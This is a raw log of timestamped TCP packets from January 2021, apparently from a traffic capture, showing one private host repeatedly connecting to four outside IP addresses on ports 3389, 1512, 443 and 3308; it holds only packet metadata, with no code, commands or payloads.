Jan 12, 2021 01:44:39.621598959 CET	3389	49239	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:39.621642113 CET	3389	49239	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:39.621670008 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.621736050 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.626688957 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.693746090 CET	3389	49239	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:39.693834066 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.699636936 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.699795008 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.754600048 CET	3389	49239	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:39.754678965 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.794173956 CET	3389	49239	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:39.809489012 CET	3389	49239	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:39.809534073 CET	3389	49239	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:39.898233891 CET	3389	49239	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:39.898298025 CET	3389	49239	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:39.898411989 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.899740934 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.904268980 CET	49239	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:39.958703995 CET	3389	49239	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:40.015664101 CET	49240	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:40.068591118 CET	1512	49240	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:40.068900108 CET	49240	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:40.070307970 CET	49240	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:40.123125076 CET	1512	49240	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:40.130148888 CET	1512	49240	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:40.130206108 CET	1512	49240	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:40.130294085 CET	49240	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:40.130388975 CET	49240	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:40.143907070 CET	49240	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:40.198091984 CET	1512	49240	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:40.198426962 CET	49240	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:40.209191084 CET	49240	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:40.209498882 CET	49240	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:40.262430906 CET	1512	49240	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:40.262738943 CET	49240	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:40.302381039 CET	1512	49240	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:40.315810919 CET	1512	49240	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:40.315851927 CET	1512	49240	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:40.415978909 CET	1512	49240	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:40.416026115 CET	1512	49240	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:40.416266918 CET	49240	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:40.422347069 CET	49240	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:40.475224018 CET	1512	49240	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:40.535376072 CET	49241	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:40.587351084 CET	443	49241	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:40.587587118 CET	49241	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:40.589227915 CET	49241	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:40.640903950 CET	443	49241	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:40.655749083 CET	443	49241	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:40.655872107 CET	49241	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:40.671889067 CET	49241	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:40.725995064 CET	443	49241	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:40.726134062 CET	49241	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:40.733072042 CET	49241	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:40.733453989 CET	49241	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:40.785254002 CET	443	49241	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:40.785458088 CET	49241	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:40.823218107 CET	443	49241	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:40.837215900 CET	443	49241	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:40.954788923 CET	443	49241	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:40.954833031 CET	443	49241	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:40.955125093 CET	49241	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:40.960675001 CET	49241	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:41.012625933 CET	443	49241	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:41.088829994 CET	49242	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:41.132033110 CET	3308	49242	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:41.132169008 CET	49242	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:41.133796930 CET	49242	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:41.176884890 CET	3308	49242	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:41.192564964 CET	3308	49242	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:41.192609072 CET	3308	49242	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:41.192679882 CET	49242	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:41.192728996 CET	49242	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:41.207570076 CET	49242	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:41.252674103 CET	3308	49242	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:41.252922058 CET	49242	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:41.263458967 CET	49242	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:41.263731003 CET	49242	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:41.307018042 CET	3308	49242	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:41.307313919 CET	49242	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:41.346363068 CET	3308	49242	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:41.350608110 CET	3308	49242	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:41.350651026 CET	3308	49242	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:41.463102102 CET	3308	49242	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:41.463146925 CET	3308	49242	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:41.463334084 CET	49242	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:41.468787909 CET	49242	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:41.511989117 CET	3308	49242	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:41.580446005 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:41.634949923 CET	3389	49243	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:41.635071993 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:41.636554956 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:41.691150904 CET	3389	49243	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:41.709331989 CET	3389	49243	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:41.709399939 CET	3389	49243	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:41.709517002 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:41.709553003 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:41.721405983 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:41.782784939 CET	3389	49243	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:41.783171892 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:41.800647974 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:41.800843000 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:41.855120897 CET	3389	49243	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:41.855397940 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:41.895426035 CET	3389	49243	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:41.909697056 CET	3389	49243	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:41.909744024 CET	3389	49243	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:41.999717951 CET	3389	49243	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:41.999763012 CET	3389	49243	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:41.999811888 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:41.999847889 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:42.003077030 CET	49243	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:42.058090925 CET	3389	49243	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:42.110874891 CET	49244	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:42.163789034 CET	1512	49244	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:42.163973093 CET	49244	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:42.165877104 CET	49244	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:42.218636990 CET	1512	49244	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:42.225583076 CET	1512	49244	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:42.225635052 CET	1512	49244	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:42.225714922 CET	49244	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:42.243434906 CET	49244	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:42.297521114 CET	1512	49244	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:42.297753096 CET	49244	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:42.308293104 CET	49244	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:42.308604956 CET	49244	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:42.361454010 CET	1512	49244	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:42.361766100 CET	49244	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:42.398252010 CET	1512	49244	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:42.414633989 CET	1512	49244	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:42.515069962 CET	1512	49244	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:42.515117884 CET	1512	49244	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:42.515366077 CET	49244	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:42.520864964 CET	49244	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:42.573858976 CET	1512	49244	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:42.641298056 CET	49245	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:42.693274021 CET	443	49245	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:42.693453074 CET	49245	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:42.696182966 CET	49245	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:42.748070955 CET	443	49245	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:42.762681007 CET	443	49245	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:42.762784004 CET	49245	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:42.778424025 CET	49245	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:42.832609892 CET	443	49245	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:42.832918882 CET	49245	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:42.843302011 CET	49245	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:42.843616009 CET	49245	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:42.895472050 CET	443	49245	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:42.895819902 CET	49245	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:42.935276985 CET	443	49245	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:42.947825909 CET	443	49245	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:43.066323042 CET	443	49245	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:43.066404104 CET	443	49245	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:43.066641092 CET	49245	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:43.072542906 CET	49245	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:43.124488115 CET	443	49245	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:43.187875986 CET	49246	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:43.231206894 CET	3308	49246	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:43.231420040 CET	49246	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:43.232922077 CET	49246	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:43.276012897 CET	3308	49246	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:43.286681890 CET	3308	49246	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:43.286717892 CET	3308	49246	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:43.286885977 CET	49246	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:43.286936998 CET	49246	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:43.301847935 CET	49246	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:43.347433090 CET	3308	49246	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:43.347735882 CET	49246	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:43.358211040 CET	49246	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:43.358480930 CET	49246	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:43.401628971 CET	3308	49246	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:43.402010918 CET	49246	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:43.442439079 CET	3308	49246	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:43.445266008 CET	3308	49246	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:43.445308924 CET	3308	49246	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:43.558279037 CET	3308	49246	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:43.558322906 CET	3308	49246	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:43.558576107 CET	49246	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:43.564135075 CET	49246	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:43.607362032 CET	3308	49246	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:43.686624050 CET	49247	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:43.741249084 CET	3389	49247	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:43.741435051 CET	49247	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:43.742772102 CET	49247	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:43.797157049 CET	3389	49247	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:43.812849998 CET	3389	49247	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:43.812896967 CET	3389	49247	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:43.813054085 CET	49247	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:43.813107967 CET	49247	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:43.824882984 CET	49247	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:43.892122984 CET	3389	49247	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:43.892458916 CET	49247	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:43.902475119 CET	49247	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:43.902659893 CET	49247	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:43.957474947 CET	3389	49247	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:43.957859993 CET	49247	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:43.996952057 CET	3389	49247	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:44.012466908 CET	3389	49247	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:44.012511015 CET	3389	49247	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:44.186475039 CET	3389	49247	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:44.186521053 CET	3389	49247	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:44.186800957 CET	49247	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:44.192397118 CET	49247	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:44.246879101 CET	3389	49247	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:44.306638956 CET	49248	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:44.359911919 CET	1512	49248	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:44.360029936 CET	49248	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:44.361319065 CET	49248	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:44.414361954 CET	1512	49248	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:44.421241999 CET	1512	49248	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:44.421284914 CET	1512	49248	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:44.421334982 CET	49248	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:44.421386003 CET	49248	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:44.427881002 CET	49248	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:44.482954979 CET	1512	49248	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:44.483166933 CET	49248	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:44.491245985 CET	49248	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:44.491341114 CET	49248	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:44.544404030 CET	1512	49248	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:44.544787884 CET	49248	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:44.582506895 CET	1512	49248	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:44.598016024 CET	1512	49248	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:44.598061085 CET	1512	49248	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:44.698533058 CET	1512	49248	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:44.698577881 CET	1512	49248	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:44.698913097 CET	49248	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:44.704499006 CET	49248	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:44.757694006 CET	1512	49248	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:44.828008890 CET	49249	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:44.880465031 CET	443	49249	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:44.880664110 CET	49249	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:44.882174015 CET	49249	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:44.934245110 CET	443	49249	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:44.949043036 CET	443	49249	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:44.949239969 CET	49249	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:44.967303038 CET	49249	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:45.021872044 CET	443	49249	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:45.022146940 CET	49249	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:45.052517891 CET	49249	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:45.052845001 CET	49249	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:45.105000973 CET	443	49249	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:45.105168104 CET	49249	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:45.157485008 CET	443	49249	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:45.274975061 CET	443	49249	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:45.275022030 CET	443	49249	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:45.275356054 CET	49249	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:45.280925989 CET	49249	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:45.333163977 CET	443	49249	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:45.402956963 CET	49250	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:45.446542978 CET	3308	49250	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:45.446825027 CET	49250	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:45.448414087 CET	49250	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:45.491552114 CET	3308	49250	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:45.502619982 CET	3308	49250	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:45.502669096 CET	3308	49250	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:45.502734900 CET	49250	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:45.502774000 CET	49250	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:45.518673897 CET	49250	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:45.565438986 CET	3308	49250	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:45.565721035 CET	49250	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:45.575453997 CET	49250	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:45.575553894 CET	49250	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:45.618689060 CET	3308	49250	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:45.619015932 CET	49250	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:45.659497023 CET	3308	49250	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:45.662200928 CET	3308	49250	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:45.662242889 CET	3308	49250	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:45.775048971 CET	3308	49250	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:45.775096893 CET	3308	49250	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:45.775430918 CET	49250	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:45.780976057 CET	49250	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:45.824099064 CET	3308	49250	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:45.901824951 CET	49251	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:45.955884933 CET	3389	49251	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:45.956089973 CET	49251	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:45.957487106 CET	49251	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:46.011941910 CET	3389	49251	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:46.036344051 CET	3389	49251	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:46.036391020 CET	3389	49251	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:46.036511898 CET	49251	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:46.036561012 CET	49251	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:46.050479889 CET	49251	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:46.110482931 CET	3389	49251	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:46.110749960 CET	49251	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:46.120490074 CET	49251	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:46.120575905 CET	49251	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:46.174649954 CET	3389	49251	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:46.174824953 CET	49251	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:46.214231968 CET	3389	49251	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:46.229266882 CET	3389	49251	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:46.229357004 CET	3389	49251	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:46.319266081 CET	3389	49251	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:46.319310904 CET	3389	49251	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:46.319545984 CET	49251	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:46.325207949 CET	49251	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:46.379362106 CET	3389	49251	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:46.448201895 CET	49252	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:46.501414061 CET	1512	49252	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:46.501729965 CET	49252	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:46.503211021 CET	49252	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:46.556077003 CET	1512	49252	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:46.562855959 CET	1512	49252	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:46.562887907 CET	1512	49252	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:46.563020945 CET	49252	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:46.563071012 CET	49252	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:46.577013969 CET	49252	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:46.631150007 CET	1512	49252	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:46.631320000 CET	49252	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:46.640537024 CET	49252	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:46.640842915 CET	49252	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:46.693748951 CET	1512	49252	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:46.693986893 CET	49252	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:46.730475903 CET	1512	49252	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:46.747594118 CET	1512	49252	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:46.747636080 CET	1512	49252	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:46.850125074 CET	1512	49252	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:46.850171089 CET	1512	49252	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:46.850574017 CET	49252	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:46.856092930 CET	49252	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:46.909231901 CET	1512	49252	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:46.978611946 CET	49253	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:47.030455112 CET	443	49253	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:47.030653954 CET	49253	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:47.032423973 CET	49253	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:47.084292889 CET	443	49253	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:47.099344015 CET	443	49253	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:47.099565983 CET	49253	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:47.115873098 CET	49253	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:47.170214891 CET	443	49253	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:47.170555115 CET	49253	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:47.181035995 CET	49253	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:47.181324005 CET	49253	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:47.233109951 CET	443	49253	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:47.233436108 CET	49253	443	192.168.2.22	77.220.64.37
